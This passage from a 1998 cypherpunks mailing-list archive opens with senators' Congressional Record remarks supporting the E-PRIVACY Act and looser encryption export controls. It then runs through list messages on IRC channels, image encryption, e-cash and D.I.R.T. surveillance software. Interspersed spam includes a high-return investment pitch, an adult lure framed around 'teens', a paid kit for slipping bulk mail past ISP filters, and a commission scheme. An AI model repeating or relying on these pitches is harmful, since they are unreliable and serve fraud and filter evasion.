  No one disputes the fact that the development and use of robust
encryption worldwide will continue with or without U.S. business
participation. What is particularly disturbing to me is that export
controls, instead of achieving their intended purpose, have only served
to deny America's premier computer industry the opportunity to compete
on a level playing field with foreign competitors. Costing our economy
and our nation billions of dollars and the loss of countless American
jobs in the process. Given the wide availability of encryption
technology, continuing to restrict U.S. access to foreign markets makes
no sense.

  Mr. ASHCROFT. That is absolutely correct. The Administration's
encryption policy is, in effect, a tax on American consumers. We owe it

to these customers and the innovators in the software industry to
reform this encryption policy now. From the birth of the United States,
this country has been a world leader in innovation, creativity,
entrepreneurship, vision and opportunity. Today all of these American
attributes are on display in our technology sector. Whether in
telecommunications, or computer hardware or software, the United States
has maintained a leadership position because of the opportunities
afforded to people with the vision, determination and responsibility to
reach for their highest and best. We must work diligently to ensure
that ample opportunities are maintained in this country for our
technology sector to continue to thrive and innovate. If companies are
stifled and cannot compete, then the people, the ideas, the jobs, and
the economic growth will simply go elsewhere.

  Mr. BURNS. In the computer business these days, they talk about
``Internet time.'' In the Internet industry, where product life cycles
can be as low as 6 months, the world changes rapidly. Yet we have been
debating this issue for over five years now, while America's sensitive
communications go unsecured, our critical information infrastructures
go unprotected, and our electronic commerce jobs get shipped overseas.
It is time for the Congress to act.

  Mr. ASHCROFT. If this issue is not resolved, and resolved soon, we
will lose this industry, we will lose our leadership position in
technology, and our national security will suffer. We have a choice to
make as policy makers--do we allow our companies to compete
internationally or do we force them, by our antiquated and ill-
conceived government policy, to move overseas. We cannot simply ignore
the reality that robust encryption exists in the international
marketplace now. Instead, we must allow our companies to compete, and
do so now. We cannot allow extraneous issues to stand in the way of
remedying the deficiencies with our current approach to encryption. We
must recognize that keeping the encryption industry on American shores
is the best way to ensure national security. We would not think of
allowing all our defense industries to move abroad. By the same token,
we should not force the encryption industry abroad through outdated
policies. Simply put, strong encryption means a strong economy and a
strong country. This concern is just one of the many reasons we need to
pass effective encryption legislation this year and just one of the
reasons that Senator Leahy and I recently drafted the E-PRIVACY bill,
S. 2067.

  Mr. LEAHY. I join with my colleagues from both sides of the aisle in
calling for passage of good encryption legislation that promotes
computer privacy, fosters the global competitiveness of our high-tech
industries, and encourages the widespread use of strong encryption as
an online crime prevention and anti-terrorism tool. The E-PRIVACY bill
that I have sponsored with Senator Ashcroft, Senator Burns and others,
satisfies these goals. Prompt Senate consideration of encryption
legislation is sorely needed to protect America's economy and security.

  Mr. CRAIG. Mr. President, the E-PRIVACY bill seeks to protect
individual privacy, while at the same time addressing national security
and law enforcement interests. It would also modernize export controls
on commercial encryption products.

  The E-Privacy Act specifically addresses the concerns of law
enforcement. First and foremost, it makes it a crime to intentionally
use encryption to conceal incriminating communications or information.
It also provides that with an official subpoena, existing wiretap
authority can be used to obtain communications decryption keys/
assistance from third parties.

  Mrs. MURRAY. Mr. President, I want to thank Senator Leahy, Senator
Burns and Senator Ashcroft as well as Senator Lott and Senator Daschle
for their work and leadership on the issue of encryption. I am proud to
be an original cosponsor of S. 2067, the E-PRIVACY Act.


  This is my sixth year as a member of the Senate and the sixth year I
have advocated for reasonable legislation on encryption. Sadly, the
Administration has not been a constructive player in this debate. It is
time for the United States to acknowledge that we no longer exclusively
control the pace of technology. Purchasers around the world can
download software off of the Internet from any country by simply
accessing a website. Foreign purchasers have turned to Russian, German,
Swiss and other foreign vendors for their encryption needs.

  Washington state and American companies deserve the opportunity to
compete free from unreasonable government restrictions. Their role in
the international marketplace should be determined by their ingenuity
and creativity rather than an outdated, ineffectual system of export
controls. The time to act is now. I urge the Senate to consider the E-
PRIVACY Act at the earliest opportunity.

  Mr. BURNS. The basic facts remain the same. People need strong,
unescrowed encryption to protect themselves online in the information

[[Page S6440]]

age. Law enforcement has legitimate concerns about the spread of this
technology, and we must work to provide them the tools and expertise
they need to keep up with advances in encryption technology. We cannot
stop time, however. The genie is out of the bottle. As Bill Gates, the
CEO of Microsoft, recently said, ``Encryption technology is widely
available outside the United States and inside the United States, and
that's just a fact of life.''

  Mr. CRAIG. With the rapid expansion of the ``super highway'' and
Internet commerce it is crucial we bring encryption legislation to the
forefront. A secure, private and trusted national and global
information infrastructure is essential to promote citizens' privacy
and economic growth.

  Mr. BURNS. As my colleagues recognize, technically advanced and
unobtrusive encryption is fundamental to ensuring the kind of privacy
Americans will need and desire in the years to come. Congress must
choose a future where individuals and companies will have the tools
they need to protect their privacy, not a future where people fear the
use electronic commerce because they have no security.

  I commend the Majority Leader, Senators Ashcroft, Leahy, Craig,
Wyden, and Murray for their vision and bipartisan leadership on this
issue. I hope that Congress will be able to move forward with real
encryption reform legislation that protects the privacy and security of
Americans in the Information Age, before it is too late.

  Mr. LOTT. I think it is worth repeating to my colleagues that the
Administration's approach to encryption makes no sense. It is not good
policy. Continuing to restrict the foreign sale of American encryption
technology that is already available abroad, or will soon be available,
is anti-business, anti-consumer, anti-jobs, and anti-innovation.

  The time for a change in America's export regime is long overdue.
Unfortunately, the Administration continues to support its outmoded and
competition-adverse encryption control policy. That is why this
Congress needs to find a legislative solution to this issue.

  If America's export controls are not relaxed now, then Congress
places in peril our entire technology industry. Not just those
companies that create and market encryption products and services, but
virtually every company involved in the development and sale of
computer hardware and software. Congress cannot and will not put
America's entire technological base at risk for an ineffective and
outmoded export policy on encryption.

                          ____________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 18 Jun 1998 06:20:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Tim's views on the racial problem in America
In-Reply-To: <199806180256.EAA13151@basement.replay.com>
Message-ID: <199806181320.JAA04879@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


These bland-info-overloaded days, Blanc:

   The Center of Attention = the Eccentric

You will not be visible, listened to, or read online 
unless you got something deeply offensive to 
say, quote, report, swear to god to, degrading of
self and others, litigable, libellous, insulting, vulgar, 
prohibited by multiple laws, violative of fairness and 
decency, newsworthy, or a well-thought-out alternative 
to sheepledom, Joe Sixdom, PC, MC, Real Identity,
the Tax Code, unequal distribution of wealth, straight
sex, kinky sex, fat, diet, exercise, sloth, grammatical 
rigor, speaking in unknown tongues, numeracy, 
science, art, politics, religion, quantum computing,
nanotech, borderlessness, Y2K, the talk shows,
the amazing future of the Internet.

The center is gone for good, cry a tear, then bravely affirm:
good riddance to Ptolemaic centricity. Normalcy is now para.
Listen to what your teeth are picking up from the spectrum
transmitting to the inner ear bone: the spheres whistling
Dixie in the dark.

Tim's telling what the quarks are whispering.

Tim's an oddball wizard, we're all bank-shot eccentrics, 
no home on earth, we the intergalactic outcasts gumming
the dried teat once unemptiable: faith, self, clan, country,
ideology, bye, bye (white male) American pie.

There's one Rosebud refuge left: the US Senate/Bohemian
Club.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Thu, 18 Jun 1998 04:13:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cypherpunks/IRC
Message-ID: <3588F701.46627B60@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

I go to #cypherpunks and it says that I create the room. Where the
heck is the room?

Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gowrynath Sivaganeshamoorthy <gowry@IBS-GmbH.net>
Date: Thu, 18 Jun 1998 05:19:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks/IRC
In-Reply-To: <3588F701.46627B60@kki.net.pl>
Message-ID: <19980618141915.A13879@stadtleben.de>
MIME-Version: 1.0
Content-Type: text/plain


Du - Jan - hast am Thu, Jun 18, 1998 at 01:16:17PM +0200 folgendes zum Thema "Cypherpunks/IRC" geschrieben:
| Greetings,
| 
| I go to #cypherpunks and it says that I create the room. Where the
| heck is the room?
| 
| Jan

I think you need to say which net. IRCnen, DALnet, EFnet, UNDERnet ?

bye,

Gowry

-- 
	=>Gowrynath Sivaganeshamoorthy     		      Administration <
	=>IBS GmbH Hamburg		   	      	Ph: +49 40 668649 11 <
	=>Friedrich-Ebert-Damm 202a	  	      	Fx: +49 40 668649 49 <
	=>22047 Hamburg / Germany	       Ripe: IZAX / InterNic: GS6450 <
	=>Key fingerprint = E3 E2 28 FA A5 03 87 95  A2 6F EE 00 9F BB CE 21 <




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Thu, 18 Jun 1998 06:44:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FLMASK
Message-ID: <35891A89.64D37B5F@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

This is the address of flmask... if you're intrested.
Side note: In my program I want to use PGP.
http://www.igat.com/flmask/home_e.htm
Sincerely yours,
Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nissa Marion <nmarion@ibm.net>
Date: Thu, 18 Jun 1998 13:17:26 -0700 (PDT)
To: Jan <jdobruck@kki.net.pl>
Subject: Re: Crypto Books/Archive
In-Reply-To: <006101bd9a1d$29071120$a460a0d1@jason.kc1.net>
Message-ID: <3.0.5.32.19980618161329.00578d60@pop3.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


>But if you want to send
>the whole image, and make that little piece invisible to everyone else
>but the sender... this is what I'm getting at. 

Man.. that would make it pretty useless to the receiver, now, wouldn't it?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nissa Marion <nmarion@ibm.net>
Date: Thu, 18 Jun 1998 13:30:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks/IRC
In-Reply-To: <3588F701.46627B60@kki.net.pl>
Message-ID: <3.0.5.32.19980618162751.0058a6c0@pop3.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 PM 6/18/98 +0200, you wrote:
>Greetings,
>
>I go to #cypherpunks and it says that I create the room. Where the
>heck is the room?
>
>Jan
>


Are you using EFnet? Because that is what was suggested to you, and I just
tried it and it was indeed there... There were only two people (maybe bots)
there, but it did certainly exist.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Thu, 18 Jun 1998 18:40:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks/IRC
In-Reply-To: <3589906A.BA926D9@kki.net.pl>
Message-ID: <Pine.LNX.3.96.980618183854.8306A-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain


We are there on EfNet (#cypherpunks), most of the time nuge and I
atleast, and LuckyG comes in on occasion, aswell as others. I am Working
on securing the channel a bit now...

Billy

-- Max Inux (MaxInux@bigfoot.com) UIN: 207447, http://khercs.dyn.ml.org
Strong Cryptography makes the world a safer place- PGP: 0x5CCFCA59
Or Kinky sex makes the world go round- Christie: Your in my sig too
^^ If Cryptography is outlawed,  only outlaws will have cryptography ^^

 

On Fri, 19 Jun 1998, Jan wrote:

> 
> Greetings,
> 
> I tried EFNet and there was noone there. That's the reason why I was
> so frustrated... I'll try a few more time and tell relate what
> happened.
> Jan out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: coy60@ohrid.cca.vu.nl
Date: Thu, 18 Jun 1998 11:05:40 -0700 (PDT)
To: coy60@ohrid.cca.vu.nl
Subject: Returns You Have Asked For
Message-ID: <199806184210PAA51746@176.61.121.1>
MIME-Version: 1.0
Content-Type: text/plain


 
America's largest monopoly shattered!!!!!
New growth market 2 1/2 times size of telephone industry 
Now open to general public.
Over 50% returns. IRA approved.
More details and short video presentation here

http://205.134.183.46/fpc/alt.html





o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fiy83@unipa.it
Date: Thu, 18 Jun 1998 10:51:28 -0700 (PDT)
To: fiy83@unipa.it
Subject: Check this out, It's worth a look
Message-ID: <199806182489ZAA56214@202.1.230.110>
MIME-Version: 1.0
Content-Type: text/plain



Wayward Teens

They Can't Keep Their Damn Clothes On!!!

We've Captured It On Film, and We're Giving It Away!

For The Next Two Weeks Only!!!

Come To,   http://209.84.246.106/amateur/

You can also copy and paste the above URL.  



 7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Thu, 18 Jun 1998 22:32:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Tim's views on the racial problem in America
In-Reply-To: <3.0.5.32.19980617231318.0086ad00@cnw.com>
Message-ID: <3.0.5.32.19980618221716.00895b60@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

>The center is gone for good, cry a tear, then bravely affirm:
>good riddance to Ptolemaic centricity. Normalcy is now para.
>Listen to what your teeth are picking up from the spectrum
>transmitting to the inner ear bone: the spheres whistling
>Dixie in the dark.
............................................

I know just what you mean, JYA.

	"He took his vorpal sword in hand;
	Long time the manxome foe he sought - 
	So rested he by the Tumtum tree,
	And stood awhile in thought.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Thu, 18 Jun 1998 15:07:49 -0700 (PDT)
To: Nissa Marion <cypherpunks@toad.com
Subject: Re: Cypherpunks/IRC
In-Reply-To: <3.0.5.32.19980618162751.0058a6c0@pop3.ibm.net>
Message-ID: <3589906A.BA926D9@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

I tried EFNet and there was noone there. That's the reason why I was
so frustrated... I'll try a few more time and tell relate what
happened.
Jan out.

Nissa Marion wrote:
> 
> At 01:16 PM 6/18/98 +0200, you wrote:
> >Greetings,
> >
> >I go to #cypherpunks and it says that I create the room. Where the
> >heck is the room?
> >
> >Jan
> >
> 
> Are you using EFnet? Because that is what was suggested to you, and I just
> tried it and it was indeed there... There were only two people (maybe bots)
> there, but it did certainly exist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Thu, 18 Jun 1998 15:15:23 -0700 (PDT)
To: Nissa Marion <cypherpunks@toad.com
Subject: Re: Crypto Books/Archive
In-Reply-To: <006101bd9a1d$29071120$a460a0d1@jason.kc1.net>
Message-ID: <35899234.D45BFABA@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Nissa Marion wrote:
> 
> >But if you want to send
> >the whole image, and make that little piece invisible to everyone else
> >but the sender... this is what I'm getting at.
> 
> Man.. that would make it pretty useless to the receiver, now, wouldn't it?

Greetings,

The thing is, the receiver can decode it because he knows his
passphrase so only he will see the image and noone else. It's like
like PGP only with pictures, not plaintext. But if you guys think the
idea is stupid, I'll scrach it.
Jan out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hippyman <hippyman@alltel.net>
Date: Thu, 18 Jun 1998 11:47:30 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: TheCodex's D.I.R.T. surveillance software
Message-ID: <199806181847.NAA29802@client.alltel.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:50 AM 6/18/98 , you wrote:
>I have come across a webpage at
>
>http://www.thecodex.com/dirt.html
>
>that describes a so-called D.I.R.T. (Data Interception by Remote
>Transmission) software enabling the attacker (be it a criminal or
>police or govt.) to remotely keep a close eye on everything that't
>going on on the target PC. I can pretty much imagine how it works once
>it's installed but what I'd like to know is *how* it gets installed on
>the target computer?
>I would also appreciate any info about the product from people with
>first hand experience, since I intend to do an in-depth research for
>one of the European Governments.

Why don't you contact the owner and ask him how it works?  Posting to
cypherpunks and asking questions about it seems a bit unusual.  Smells like
a spam.  

You're name wouldn't be Spyking, would it? 

hippyman 
ICQ: 11517383
PGP Fingerprint: E3C3 35C8 0FD9 6F36 2ADD 0541 B58C F6BD D347 BD0A
Public Key: http://keys.pgp.com:11371/pks/lookup?op=get&search=0xD347BD0A




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Fri, 19 Jun 1998 02:12:04 -0700 (PDT)
Subject: Never Recieve Junk Mail Again!
Message-ID: <199806190911.CAA17416@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


    Wouldn't it be great to never get junk e-mail again? Well, No one can make you that promise 
unfortunetly....but you can Profit from junk e-mail.There's an old saying "If you can't beat 
em..join em!" You can make incredible money sending your own mass e-mails. If you own 
your own business or have a product or idea to sell , then you probably know that all 
advertising works..it's just a question of whether it's cost effective or not. What could be more 
cost effective that a ZERO cost of adverising? If you sent out 500,000 e-mails which would 
take you only a few minutes to set your computer up to do,and you only recieved one half of 
one percent responce..that would be 2500 people responding to your ad. And the cost to do it 
was NOTHING. Junk e-mail is here to stay, the U.S Congress in their infinite wisdom has 
recently passed legislation legitimizing mass e-mail. So wouldn't it be nice to laugh every time 
you recieve a piece of junk e-mail from someone because you'll know for every one you 
recieve ,you're sending out hundreds of  thousands. If your computer is sitting idle while you're 
at work or play...your crazy! You could be earning money while your asleep,at work or out 
having fun. It's not like you have to sit there and watch it run!
     So why isn't every one doing it. Well, your local internet service provider spent lots of money 
installing filtering equiptment to keep out this so called junk e-mail and in fact for years there's 
been sort of a fun little war going on between the junk e-mail software writers and the internet 
serrvice provider filter software writers to see who could out smart who.The end result is that 
sending mass e-mails legally has become an art . But it's really all about knowing the secrets 
and having the right software.
      AVATAR Publishing is offering you the type of expertise and support that would take you 
years to learn.We know all the secrets (obviously or you wouldn't be reading this would you?) 
and we have the software to deliver to most of the internet service providers. So her's the 
offer... AVATAR is offering you a mass e-mail starter kit complete with step by step instructions 
on how to get sarted sending out mass e-mail...a current explanation of what's legal and not 
legal...how to extract e-mail addresses from the internet ...how to get targeted e-mail 
addresses...a FREE trial version of the most effective mass e-mail software program ever 
developed...a list of bulk e-mail friendly internet service providers....a complete explaination of 
the secrets of how to legally get your mail through the filtering and why it works....and finally a 
real telephone number so you can have technical support and keep updated on new 
developments in the mass e-mail community.The total cost of this kit is only  $29 
    If you would like to stop having you computer sit idle while your at work or asleep and start 
having it make money for you  .....   Send $29  to AVATAR Publishing
                                                                                  832 Colorado Blvd.
                                                                                  Los Angeles,Ca 90041 

If you would like to be removed from our e-mail list ,send a written request to the above 
address






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thall322@mci2000.com
Date: Fri, 19 Jun 1998 03:22:41 -0700 (PDT)
To: gtds42ncd71@generalnet.com
Subject: Earn $100 every time OUR phone rings...
Message-ID: <199806191022.EAA00619@crotalus.gates.com>
MIME-Version: 1.0
Content-Type: text/plain



ALL YOU DO IS ADVERTISE THIS 800 NUMBER! THAT'S ALL!! 

$100 goes to you for EVERY sale that the company closes!

Does the idea of making at least $1,000 per week beginning your 2nd week of 
doing business excite you? 

How about never having to sell a thing to your customer and never having 
to talk to ANYONE to make money? I don't know how this could get any easier.

EVERY aspect of selling or talking to someone is DONE COMPLETELY by the company!  

The number one home based business for the 2nd year in a row, Fortune 5000 
is a member of the Better Business Bureau and the U.S. Chamber of Commerce.

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and 
  sends you WEEKLY commission checks! 

* It pays you a $100 commission (that's over 50% of the total sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your first 
  week or two... Quick commission earnings build and maintain motivation. 
  ALL YOU DO IS ADVERTISE the toll-free number and your ID number. 

* You can get STARTED TODAY. Just advertise the business toll-free 
  number with your ID # and let this business CLOSE YOUR SALES every day...
  They do all the work and YOU GET PAID FOR IT! 

* You may advertise any way you choose: Bulk E-Mail, Flyers, Classifieds, 
  Postcards, etc. Suppose you use bulk E-Mail, as I am: 100,000 E-Mails
  with a 1/10th of a percent (0.1%) sales rate at $100 per sale nets 
  $10,000... not too bad.

There is nothing else out there that will provide you with an immediate income 
beginning THIS WEEK with minimal effort.

Before you call, I want you to think about the quality of the live 
operators handling your call. I am convinced you will not find 
a better team of closers for your own personal sales.  You will 
clearly understand what I am talking about once you call.  

PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!

1-800-811-2141

You will be asked for ID #50030 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through Saturday and 
will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949, 888-446-6951
or 888-731-3457 (all toll free). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Fri, 19 Jun 1998 16:24:52 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News From WOW-COM - June 19, 1998
Message-ID: <199806191700.MAA22741@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



================================
Welcome to the second day of the CTIA
Daily News From WOW-COM.  Please click
on the icon for the most important news in
wireless communications today.
================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 19 Jun 1998 13:05:27 -0700 (PDT)
To: jy@jya.com
Subject: US attorney MOTION TO REMAND
Message-ID: <358AC3B0.7357@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 6/19/98 1:42 PM

John Young

Morales and I met for lunch.

I just finished documents referencing the two Tenth circuit
docket sheets you posted on our cases.

http://jya.com/whp-10usca.htm
http://www.jya.com/arm061298.htm

Zeitgeist again.  We are moving to the Tenth circuit AGAIN.

http://www.jya.com/whp061098.htm
http://www.jya.com/whp060998.htm

Morales is going to come over review, then we will send you AND
ABOUT EVERY Member of Congress A COPY.

Mitchell's attempt for the in camera ex parte meeting with the court
may have failed.  Thanks to you and Orlin.  And, consequently, some
upset Members of Congress.

http://www.jya.com/whp052898.htm

I, of course, DENY I called judge Santiago Campos a FASCIST PIG.
Try searching for PIG.

That is likely the reason Mitchell phoned this morning to say she going
to file to remand the first FOIA [algorithms] request to NSA.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bozhidar V Bozhinov <boshko@uni-svishtov.bg>
Date: Fri, 19 Jun 1998 05:08:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: e-cash
Message-ID: <358A544E.A0DCE57A@uni-svishtov.bg>
MIME-Version: 1.0
Content-Type: text/plain

Dear Sirs,

This is Mr. Bozhinov from the D. Tsenov Academy of Economics writing.
I am at the present time a Ph. D. student at the Department of Finance
in the framework of The Academy.
Through Internet saw in the Web site that you are work in the aria of
e-money.
Unfortunately, at the moment in Bulgaria there are a few academitions,
when are working in this problem. That's why I would like to ask you for
more information about this problem.
I'd be very grateful if you might recommend me or send me some materials
concerning this question.
Look forward hearing from you soon.

Yours faithfully,

Mr. B. Bozhinov, Ph. D. Student
D. Tsenov Academy of Economics



begin:          vcard
fn:             Bozhidar Bozhinov
n:              Bozhinov;Bozhidar
org:            Tsenov Academy of Economics
adr:            2 Em. Chakarov Str;;51 Cherni Vrah Str.;Svishtov;Lovech;5250;Bulgaria
email;internet: boshko@uni-svishtov.bg
title:          PhD Student
tel;work:       +359-631-22721-250
x-mozilla-cpt:  ;0
x-mozilla-html: FALSE
version:        2.1
end:            vcard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Judd Howie" <coax_k@beavisandbutthead.com>
Date: Fri, 19 Jun 1998 05:58:22 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: IRC #cypherpunks
Message-ID: <025001bd9b83$2cd4b340$e8cf15a5@irix>
MIME-Version: 1.0
Content-Type: text/plain


A cypherpunks channel has also been set up on the Austnet IRC network

irc.austnet.org and then /map for your closest server

/join #cypherpunks

that's where we are in the southern hemisphere anyway


GBH
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Support<support@abcproperty.com>
Date: Fri, 19 Jun 1998 14:24:32 -0700 (PDT)
To: jyu-ohjelmointi-cypherpunks@uunet.uu.net
Subject: Invitation FreshSite.com
Message-ID: <358ad70a.0@news.provide.net>
MIME-Version: 1.0
Content-Type: text/plain


New Invitation

FreshSite is a free service that offers the latest news on top rated Internet
downloadable shareware, freeware and evaluation software. Allowing you
to be the first ones to download and test drive fresh made software and
the latest updates!

Check it out at:  <http://www.freshsite.com/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 104367.2728e@compuserve.com
Date: Sat, 20 Jun 1998 14:52:49 -0700 (PDT)
To: mc05@mailexcite.com
Subject: INVESTMENT FRAUD:  Learn how to detect and avoid!
Message-ID: <199806200754.AAA28433@fw.uswnvg.com>
MIME-Version: 1.0
Content-Type: text/plain



Did you know that YOU could be one of MILLIONS of people who are victims
of investment fraud each year??  

Did you know that SCAM ARTISTS have defrauded people JUST LIKE YOU for
more than $10 BILLION This Year?? 

CLICK HERE ----> http://www.FraudReview-IESC.com <---- TO KEEP YOUR MONEY

If you are absolutely certain it could never be you, the fraudster starts
with a big advantage.  Investment fraud generally happens to people who
think it could never happen to them.  Learn how to avoid investment fraud,
visit http://www.FraudReview-IESC.com

BEFORE YOU INVEST - LEARN THE FACTS

Investment Evaluative Services Corporation has compiled a desktop reference
entitled "Inside the World of Investment Fraud, Scams and Deceptive
Practices".  

It is easy to read, concise and contains the investment phrases, terms, and
conditions that an investor should KNOW and AVOID!  It also contains
citations that will inform the investor of not only what investments should
be avoided, but why.  (Learn more at http://www.FraudReview-IESC.com)
 
If terms like Asset Managed Programs, Bank Debentures, High Yield/Low Risk,
Leveraged Funds, and Top 25 Banks are in your investment portfolio, you may
already be a victim of investment fraud!

If terms like Bank Guarantees of 106%, Blocked Funds Letter,  Safe Keeping
Receipt, and Trading Programs are not familiar to you, you may shortly
become a victim of investment fraud!

To learn more about Investment Evaluative Services Corporation products and
services, please continue on to our home page
http://www.FraudReview-IESC.com 
or call our toll free number  1(888)596-0956.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@pronet.net.au>
Date: Fri, 19 Jun 1998 16:54:58 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson's One Nation newsletter - June 1998 update
Message-ID: <1.5.4.32.19980619234519.0070b2d0@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 2.1, June 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

G'day One Nation supporters in NSW

New quick access to One Nation home page NOW live!!!

http://www.onenation.com.au

----------------------------

Queensland State Election:
=========================
This is our first communication since last week's Queensland State Election.

See archive of live coverage: http://www.gwb.com.au/onenation/qldstate/june13

One Nation has secured an amazing 11 seats (out of 89) with 23% of the
primary vote. (Compare this to the Nationals 23 seats on just 15% of the
primary vote!)

See: http://www.ecq.qld.gov.au/ecq/98summary.html

In the latest news it now appears likely that One Nation will support the
Coalition to ensure a stable government in Queensland - although this is not
yet finalised and the support of two independents, Liz Cunningham and Peter
Wellington still have to be secured.

------------------------------------

Unofficial One Nation daily newspaper:
=====================================

The anotd (Australian National News of the Day) - Australia's oldest on-line
saily newspaper provides reader feedback and information on Pauline Hanson
and One Nation.

The paper at:

http://www.gwb.com.au/gwb/news/daily.html

has an archive for subscribers going back to October 1995.

Negotiations are currently underway to make this paper available by "fax
back" - initially on a weekly basis. This will allow anyone with a fax to
get a weekly summary of issues being discussed faxed to them.

------------------------------------

Web Ring:
========

The One Nation web site now has a web ring listing about 20 One Nation
sites. If you wish to add a One Nation site please use the "add a web site"
link. 

All additions to the web ring are moderated and GWB's decision on whether or
not to link you is final. You are of course welcome to just carry the web
ring banner and links at:

http://www.gwb.com.au/onenation/ring1.html

Thanks to Peter for his help on this.

A number of historic One Nation web sites including the April 1997 launch in
Ipswich and Hanson's speeches are currently available from the web ring.

-------------------------------------

The power of email:
==================

I have been informed by the ABC Radio National's "Background Briefing" that
they will be talking about the power of email tomorrow (Sunday at 9.10am).

Apparently the action taken by many One Nation supporters in expressing
their concern to 60 Minutes sponsor, Toyota, about the programmes behaviour
towards Pauline Hanson and One Nation was very effective and will be raised
during the ABC report.

To all those who participated thank you. I trust you all got the standard
Toyota response broadcast in the middle of last week.

I am aware that the support shown has served its purpose for the time being
and I hope that 60 Minutes shows more balance in future or we will be
obliged to call on your support again.

See: http://www.gwb.com.au/60.html

for background on the 60 Minutes segment "A CALL TO ARMS".

----------------------------------

Federal Election:
================

One Nation's Federal Election web site is currently under development.

See: http://www.gwb.com.au/onenation/federal

----------------------------------

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hippyman <hippyman@alltel.net>
Date: Fri, 19 Jun 1998 21:16:26 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: TheCodex's D.I.R.T. surveillance software
Message-ID: <199806200416.XAA17936@client.alltel.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:29 PM 6/19/98 , you wrote:

>>>I have come across a webpage at
>>>
>>>http://www.thecodex.com/dirt.html
etc...
>>Why don't you contact the owner and ask him how it works?  Posting to
>>cypherpunks and asking questions about it seems a bit unusual.  Smells like
>>a spam.  
>>
>>You're name wouldn't be Spyking, would it? 
etc...

>Mine is and I didn't post it... I got the same request privately... from
>this person... I am not trying to sell it ... especially to a European
>government...

My wrong, then. 

I enjoy your list and didn't really think you spam another mailing list in
such a fashion as I was interpreting, but I thought I'd sniff it out anyway.

My apologies for the accusation. 

hippyman 
ICQ: 11517383
PGP Fingerprint: E3C3 35C8 0FD9 6F36 2ADD 0541 B58C F6BD D347 BD0A
Public Key: http://keys.pgp.com:11371/pks/lookup?op=get&search=0xD347BD0A




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
